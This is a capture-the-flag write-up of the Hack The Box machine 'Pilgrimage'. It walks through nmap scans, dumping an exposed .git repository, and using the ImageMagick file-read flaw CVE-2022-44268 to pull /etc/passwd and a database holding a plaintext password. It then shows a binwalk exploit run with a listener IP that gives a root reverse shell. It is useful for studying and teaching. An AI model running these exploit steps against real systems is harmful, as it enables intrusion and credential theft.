#hackthebox #easy #linux #git #git-dumper
![[Pasted image 20250802014010.png]]
# Information Gathering - Nmap
First, as usual, I performed a TCP scan against all ports and discovered 2 open ports.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpAll
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 01:33 UTC
Nmap scan report for 10.10.11.219
Host is up (0.052s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 16.99 seconds
```
Then another TCP scan against the 2 open ports, 22 and 80, to gather more information.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 01:34 UTC
Nmap scan report for 10.10.11.219
Host is up (0.045s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 20:be:60:d2:95:f6:28:c1:b7:e9:e8:17:06:f1:68:f3 (RSA)
| 256 0e:b6:a6:a8:c9:9b:41:73:74:6e:70:18:0d:5f:e0:af (ECDSA)
|_ 256 d1:4e:29:3c:70:86:69:b4:d7:2c:c8:0b:48:6e:98:04 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://pilgrimage.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.45 seconds
```
Lastly a UDP scan against top 10 ports
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 01:36 UTC
Nmap scan report for 10.10.11.219
Host is up (0.046s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
123/udp open|filtered ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
161/udp closed snmp
445/udp closed microsoft-ds
631/udp open|filtered ipp
1434/udp closed ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 5.12 seconds
```
---
# Enumeration
##### HTTP - TCP 80
The landing page was originally empty, so I have added `pilgrimage.htb` to `/etc/hosts` file.
This is what the landing page looks like. It's a website for image shrinker.
![[Pasted image 20250801204903.png]]
On `login` page, I tried some default credentials but they did not work. Therefore, I made an account under my name.
I wanted to try the shrink feature and see what happens. So I uploaded a random image and pressed the `shrink` button.
![[Pasted image 20250801205334.png]]
Then on `Dashboard` page, there was the urls for the shrunken images I uploaded. I tried 2 times. However, notice that the name of the images files I uploaded have been changed to some random strings.
![[Pasted image 20250801205756.png]]
Not only that but also Burp shows that even if I changed the file name to `.php`, the backend server changes the file extension back to `.png` which indicates acquiring webshell is going to be very difficult.
![[Pasted image 20250801222401.png]]
After I have added `pilgrimage.htb` in `/etc/hosts` file, I ran `nmap` again and this time it revealed `.git` directory is present in the server.
```bash
80/tcp open http nginx 1.18.0
|_http-title: Pilgrimage - Shrink Your Images
|_http-server-header: nginx/1.18.0
| http-git:
| 10.10.11.219:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: Pilgrimage image shrinking service initial commit. # Please ...
```
I used `git-dumper` to dump the `.git` directory
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ git-dumper http://pilgrimage.htb/.git/ git_loot/
[-] Testing http://pilgrimage.htb/.git/HEAD [200]
[-] Testing http://pilgrimage.htb/.git/ [403]
[-] Fetching common files
...
<SNIP>
```
and it contained the following. What stood out to me was `magick` binary file. I think that's responsible for converting filenames and their extensions.
```bash
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ ls
assets dashboard.php index.php login.php logout.php magick register.php vendor
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ file *
assets: directory
dashboard.php: PHP script, Unicode text, UTF-8 text, with CRLF line terminators
index.php: PHP script, Unicode text, UTF-8 text, with CRLF line terminators
login.php: PHP script, Unicode text, UTF-8 text, with CRLF line terminators
logout.php: PHP script, ASCII text, with CRLF line terminators
magick: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=9fdbc145689e0fb79cb7291203431012ae8e1911, stripped
register.php: PHP script, Unicode text, UTF-8 text, with CRLF line terminators
vendor: directory
```
`git log` didn't reveal much but one commit. We at least found a username: `emily`
```bash
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ git log
commit e1a40beebc7035212efdcb15476f9c994e3634a7 (HEAD -> master)
Author: emily <
[email protected]>
Date: Wed Jun 7 20:11:48 2023 +1000
Pilgrimage image shrinking service initial commit.
```
`./magick --version` revealed the version of the binary. Let's look it up if it has any known vulnerabilities
```bash
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ ./magick --version
Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)
```
There actually exists a known vulnerability to this version, that is `Arbitrary File Read` CVE-2022-44268
![[Pasted image 20250801224041.png]]
The PoC of the exploit can be found [here](https://git.rotfl.io/v/CVE-2022-44268) . The author wrote a very detailed step-by-step how to use. First, I cloned the github repo
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ git clone https://git.rotfl.io/v/CVE-2022-44268.git
Cloning into 'CVE-2022-44268'...
remote: Enumerating objects: 30, done.
remote: Counting objects: 100% (30/30), done.
remote: Compressing objects: 100% (19/19), done.
remote: Total 30 (delta 8), reused 30 (delta 8), pack-reused 0
Receiving objects: 100% (30/30), 954.74 KiB | 1.22 MiB/s, done.
Resolving deltas: 100% (8/8), done.
```
Run `cargo run "/etc/passwd"` command
```bash
┌──(kali㉿kali)-[~/Desktop/CVE-2022-44268]
└─$ ls
Cargo.lock Cargo.toml image.png README.md screens src
┌──(kali㉿kali)-[~/Desktop/CVE-2022-44268]
└─$ cargo run "/etc/passwd"
Updating crates.io index
Downloaded bitflags v1.3.2
Downloaded cfg-if v1.0.0
Downloaded adler v1.0.2
Downloaded hex v0.4.3
Downloaded crc32fast v1.3.2
Downloaded png v0.17.7
Downloaded flate2 v1.0.25
Downloaded miniz_oxide v0.6.2
Downloaded 8 crates (301.4 KB) in 0.23s
Compiling crc32fast v1.3.2
Compiling cfg-if v1.0.0
Compiling adler v1.0.2
Compiling bitflags v1.3.2
Compiling hex v0.4.3
Compiling miniz_oxide v0.6.2
Compiling flate2 v1.0.25
Compiling png v0.17.7
Compiling cve-2022-44268 v0.1.0 (/home/kali/Desktop/CVE-2022-44268)
Finished `dev` profile [unoptimized + debuginfo] target(s) in 4.84s
Running `target/debug/cve-2022-44268 /etc/passwd`
```
`magick image.png -resize 50% output.png` and `identify -verbose output.png`
```bash
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ ./magick image.png -resize 50% output.png
magick: keyword "Raw profile type ": bad character '0x20' `output.png' @ warning/png.c/MagickPNGWarningHandler/1750.
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ ls
assets dashboard.php image.png index.php login.php logout.php magick output.png register.php vendor
┌──(kali㉿kali)-[~/Desktop/git_loot]
└─$ identify -verbose output.png
Image:
Filename: output.png
Permissions: rw-rw-r--
Format: PNG (Portable Network Graphics)
Mime type: image/png
...
<SNIP>
```
Scroll down to the bottom, you will find the `hex`
![[Pasted image 20250801225236.png]]
and if we convert the hex back to binary we get the actual `/etc/passwd` contents. This file read is being done under `www-data` user, so we will not be able to read emily's `.ssh`.
```bash
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
emily:x:1000:1000:emily,,,:/home/emily:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
```
Then I went back to the git repo we dumped earlier and found the path of `sqlite`. I'm going to repeat the steps one more time to read `/var/db/pilgrimage` and see what it includes inside the file.
![[Pasted image 20250801232633.png]]
```bash
┌──(kali㉿kali)-[~/Desktop/CVE-2022-44268]
└─$ cargo run "/var/db/pilgrimage"
Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.01s
Running `target/debug/cve-2022-44268 /var/db/pilgrimage`
┌──(kali㉿kali)-[~/Desktop/CVE-2022-44268]
└─$ exiftool image.png
ExifTool Version Number : 13.25
File Name : image.png
Directory : .
File Size : 1660 bytes
File Modification Date/Time : 2025:08:02 04:27:37+00:00
File Access Date/Time : 2025:08:02 04:24:34+00:00
File Inode Change Date/Time : 2025:08:02 04:27:37+00:00
File Permissions : -rw-rw-r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 200
Image Height : 200
Bit Depth : 8
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Profile : /var/db/pilgrimage
Image Size : 200x200
Megapixels : 0.040
```
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ head sqlite.hex
53514c69746520666f726d617420330010000101004020200000004c0000000500000000
000000000000000400000004000000000000000000000001000000000000000000000000
00000000000000000000000000000000000000000000004c002e4b910d0ff800040eba00
0f650fcd0eba0f3800000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000
┌──(kali㉿kali)-[~/Desktop]
└─$ cat sqlite.hex | xxd -r -p > sqlite.db
```
After repeating the steps for `/var/db/pilgrimage`, I found emily's credentials inside.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlite3 sqlite.db
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE users (username TEXT PRIMARY KEY NOT NULL, password TEXT NOT NULL);
INSERT INTO users VALUES('emily','abigchonkyboi123');
CREATE TABLE images (url TEXT PRIMARY KEY NOT NULL, original TEXT NOT NULL, username TEXT NOT NULL);
COMMIT;
sqlite>
```
# Initial Access - shell as `emily`
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh emily@$IP
[email protected]'s password:
Linux pilgrimage 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
emily@pilgrimage:~$ whoami
emily
```
Found `user.txt`
```bash
emily@pilgrimage:~$ cat user.txt
fe1...
```
# Privilege Escalation
`ps faux | grep root` revealed this unusual process. Let's look at what this file does
![[Pasted image 20250802010423.png]]
`inotifywait` is monitoring over the path `/var/www/pilgrimage.htb/shrunk` for any file creation event. When a file is uploaded, `binwalk` analyzes the contents of the file.
```bash
emily@pilgrimage:/home$ cat /usr/sbin/malwarescan.sh
#!/bin/bash
blacklist=("Executable script" "Microsoft executable")
/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
binout="$(/usr/local/bin/binwalk -e "$filename")"
for banned in "${blacklist[@]}"; do
if [[ "$binout" == *"$banned"* ]]; then
/usr/bin/rm "$filename"
break
fi
done
done
```
The version of `binwalk` is 2.3.2
```bash
emily@pilgrimage:/home$ binwalk 06:12:49 [26/26]
Binwalk v2.3.2
Craig Heffner, ReFirmLabs
https://github.com/ReFirmLabs/binwalk
Usage: binwalk [OPTIONS] [FILE1] [FILE2] [FILE3] ...
Signature Scan Options:
-B, --signature Scan target file(s) for common file signatures
-R, --raw=<str> Scan target file(s) for the specified sequence of bytes
-A, --opcodes Scan target file(s) for common executable opcode signatures
-m, --magic=<file> Specify a custom magic file to use
-b, --dumb Disable smart signature keywords
-I, --invalid Show results marked as invalid
-x, --exclude=<str> Exclude results that match <str>
-y, --include=<str> Only show results that match <str>
```
Apparently, there was a known vulnerability to this version of Binwalk.
![[Pasted image 20250802011340.png]]
The PoC explains it needs 3 arguments: `.png file`, `IP to listener`, and `listener port`
![[Pasted image 20250802011642.png]]
I transferred the poc to the path of `/dev/shm` on the target host. I created an empty `.png` file. When it was successfully run, I was told to rename it to `binwalk_exploit`
```bash
emily@pilgrimage:/dev/shm$ python3 51249.py exploit.png 10.10.14.14 1234
################################################
------------------CVE-2022-4510----------------
################################################
--------Binwalk Remote Command Execution--------
------Binwalk 2.1.2b through 2.3.2 included-----
------------------------------------------------
################################################
----------Exploit by: Etienne Lacoche-----------
---------Contact Twitter: @electr0sm0g----------
------------------Discovered by:----------------
---------Q. Kaiser, ONEKEY Research Lab---------
---------Exploit tested on debian 11------------
################################################
You can now rename and share binwalk_exploit and start your local netcat listener.
```
We saw that `inotifywait` in `malwarescan.sh` is monitoring the specific path `/var/www/pilgrimage.htb/shrunk` for any file upload activity, we have to move our file to the same path to trigger our exploit.
I copied `binwalk_exploit.png` to `/var/www/pilgrimage.htb/shrunk` and I got the reverse shell as `root`!
![[Pasted image 20250802012649.png]]
Found `root.txt`
```bash
cat root.txt
621...
```